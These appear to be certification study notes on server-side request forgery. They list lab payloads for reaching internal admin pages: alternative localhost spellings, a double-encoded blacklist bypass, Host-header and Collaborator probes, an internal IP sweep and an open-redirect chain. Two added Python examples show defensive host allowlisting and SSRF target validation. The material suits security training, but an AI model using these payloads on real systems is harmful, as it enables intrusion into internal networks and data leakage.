bscp notes

SSRF

An SSRF attack causes the server to make a connection to internal services within the organization, or forces it to connect to arbitrary external systems, potentially leaking sensitive data. Burp Scanner may report an SSRF issue as "External service interaction (HTTP)".

SSRF sample payloads:

/product/nextProduct?currentProductId=6&path=https://EXPLOIT.net  

stockApi=http://localhost:6566/admin  

http://127.1:6566/admin  

Host: localhost

Alternative representations of the IP address 127.0.0.1 (accepted by inet_aton-style parsers):

  1. 2130706433 (decimal)
  2. 017700000001 (octal)
  3. 127.1 (shortened dotted form)

Bypass blacklist filter

Double URL-encode characters in the URL to obfuscate them, e.g. the letter a becomes %2561; a blacklist filter that inspects the value before the second decode never sees the blocked string, so the filter is bypassed.

Identify the SSRF in the stockApi parameter, then bypass the block on localhost and the admin endpoint by changing the target URL to: http://127.1/%2561dmin.

Absolute url and localhost Host header

GET https://TARGET.net/
Host: OASTIFY.COM

Identify the SSRF via flawed request parsing by changing the Host header to your Collaborator server while supplying an absolute URL in the GET request line, then check whether the Collaborator server receives a request.

Routing host ssrf

Identify routing-based SSRF by altering the Host header of the request and observing the response. Routing-based SSRF via the Host header allows insecure access to the internal (localhost/intranet) network.

GET / HTTP/1.1
Host: 192.168.0.§0§

Remember to add the CSRF token and session cookies to the request (§0§ marks the Burp Intruder payload position).
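
Both the absolute-URL trick above and the Host-header routing probe work only when a front end or back end lets the Host header choose where a request is sent. The following added example (written for these notes, not taken from any lab or project) shows the routing decision a front end should make instead: one authoritative source for the host, compared against an allowlist. ALLOWED_HOSTS is a constructed table; route_request returns a decision rather than performing any I/O.

```python
from urllib.parse import urlsplit

# Constructed allowlist of the virtual hosts this front end really serves.
ALLOWED_HOSTS = {"target.net", "www.target.net"}


def route_request(request_line, headers):
    """Decide which virtual host an HTTP/1.1 request is for, the way a front
    end should: one authoritative source for the host, checked against an
    allowlist, so a spoofed Host header cannot steer the request to
    localhost, 192.168.0.x or an attacker-controlled name.

    `headers` is a list of (name, value) pairs as received on the wire.
    Returns ("route", host) or ("reject", reason)."""
    try:
        _method, target, _version = request_line.split(" ")
    except ValueError:
        return ("reject", "malformed request line")
    host_values = [v.strip() for name, v in headers if name.lower() == "host"]
    if len(host_values) > 1:
        # Ambiguous; also a classic request-smuggling indicator.
        return ("reject", "multiple Host headers")
    parsed = urlsplit(target)
    if parsed.scheme and parsed.netloc:
        # Absolute-form target: RFC 7230 section 5.4 says the request line
        # wins and the Host header is ignored. The Collaborator payload in the
        # notes relies on a back end that does the opposite.
        authority = parsed.netloc
    elif host_values:
        authority = host_values[0]
    else:
        return ("reject", "missing Host header")
    host = urlsplit("//" + authority).hostname  # strips the port, lowercases
    if host not in ALLOWED_HOSTS:
        return ("reject", "host not served here")
    return ("route", host)
```

With this logic, `GET https://TARGET.net/ HTTP/1.1` plus `Host: OASTIFY.COM` is routed to target.net and never touches the Collaborator name, and `GET / HTTP/1.1` with `Host: 192.168.0.1` or `Host: localhost` is refused outright rather than forwarded into the intranet.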

Open redirection

The target makes a GET request to the next product on the e-commerce site, using a path parameter. On the stockApi POST request, the value supplied in the body is a partial path to the internal system. See the product page source code below.

In this lab the admin interface is stated to be at http://192.168.0.12:8080/admin, but in the exam use localhost:6566.

https://TARGET.net/product/nextProduct?currentProductId=1&path=http%3a//192.168.0.12%3a8080/admin

On the POST stock request, replace the stockApi value with the partial path (not the absolute URL) taken from the nextProduct GET request:

stockApi=/product/nextProduct?currentProductId=1&path=http%3a//192.168.0.12%3a8080/admin
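
The three bypasses on this page (alternative spellings of 127.0.0.1, the double-encoded %2561dmin, and the open redirect reached through a partial path) all defeat filters that look at the raw parameter value once. The added example below, written for these notes and not taken from any lab or project, shows what a fetch-side check has to do instead: decode until stable, normalise every IPv4 spelling inet_aton accepts, resolve names, refuse anything that is not globally routable, and re-run that check on every redirect hop. FAKE_DNS, the placeholder address 11.22.33.44 and lab_next_hop are constructed so the code runs offline; a real deployment would resolve with socket.getaddrinfo and connect to the checked IP rather than the name.

```python
import ipaddress
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed stand-in for DNS so the example runs offline. 11.22.33.44 is an
# arbitrary globally routable placeholder. In production resolve with
# socket.getaddrinfo and then connect to the IP you checked, not the name
# again, or DNS rebinding can change the answer between check and fetch.
FAKE_DNS = {"target.net": "11.22.33.44", "localhost": "127.0.0.1"}


def parse_ipv4_literal(host):
    """Parse the non-canonical IPv4 spellings inet_aton accepts: decimal
    (2130706433), octal (017700000001), hex (0x7f000001) and shortened
    dotted forms (127.1, 127.0.1). Returns an IPv4Address or None."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for p in parts:
        if not p or p[0] in "+-" or "_" in p:
            return None
        try:
            if p[:2].lower() == "0x":
                values.append(int(p[2:], 16))
            elif len(p) > 1 and p[0] == "0":
                values.append(int(p, 8))
            else:
                values.append(int(p, 10))
        except ValueError:
            return None
    # Every part but the last is one octet; the last fills the remaining bytes.
    if any(v > 255 for v in values[:-1]) or values[-1] >= 256 ** (5 - len(values)):
        return None
    number = 0
    for v in values[:-1]:
        number = (number << 8) | v
    number = (number << (8 * (5 - len(values)))) | values[-1]
    return ipaddress.IPv4Address(number)


def fully_decode(url, max_rounds=5):
    """Undo repeated percent-encoding (%2561 -> %61 -> a) so the check sees
    the string the back end will eventually act on."""
    for _ in range(max_rounds):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url


def target_address(url, resolve=FAKE_DNS.get):
    """IP address a request for `url` would reach, or None if unusable."""
    parts = urlsplit(fully_decode(url))
    host = parts.hostname  # lowercased; IPv6 brackets already stripped
    if parts.scheme not in ("http", "https") or not host:
        return None
    try:
        return ipaddress.ip_address(host)  # canonical IPv4 or IPv6 literal
    except ValueError:
        pass
    ip = parse_ipv4_literal(host)  # 127.1, 2130706433, 017700000001, ...
    if ip is not None:
        return ip
    resolved = resolve(host)
    return ipaddress.ip_address(resolved) if resolved else None


def is_allowed_target(url, resolve=FAKE_DNS.get):
    """Allow only globally routable destinations: loopback, RFC 1918,
    link-local (cloud metadata) and the unspecified address are refused."""
    ip = target_address(url, resolve)
    return ip is not None and ip.is_global


def naive_blacklist_allows(url):
    """The kind of check the payloads above defeat: a substring blacklist on
    the raw value, which sees neither 127.1 nor %2561dmin as dangerous."""
    lowered = url.lower()
    return not any(bad in lowered for bad in ("localhost", "127.0.0.1", "/admin"))


def follow_checked(url, next_hop, resolve=FAKE_DNS.get, max_hops=3):
    """Re-validate every hop of a redirect chain; checking only the first URL
    is what the open-redirect payload exploits. `next_hop(url)` returns the
    Location a fetch of `url` would redirect to, or None when it would not."""
    for _ in range(max_hops + 1):
        if not is_allowed_target(url, resolve):
            return url, False
        nxt = next_hop(url)
        if nxt is None:
            return url, True
        url = nxt
    return url, False  # too many redirects


def lab_next_hop(url):
    """Constructed model of the nextProduct endpoint from the notes: it
    redirects to whatever the `path` query parameter says."""
    parts = urlsplit(fully_decode(url))
    if parts.hostname == "target.net" and parts.path == "/product/nextProduct":
        return parse_qs(parts.query).get("path", [None])[0]
    return None
```

The contrast worth noting is naive_blacklist_allows versus is_allowed_target on http://127.1/%2561dmin: the substring check passes it, the address-based check resolves it to 127.0.0.1 and refuses it. Likewise follow_checked accepts the first hop to target.net but stops at the redirect into 192.168.0.12.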


Last updated 8 months ago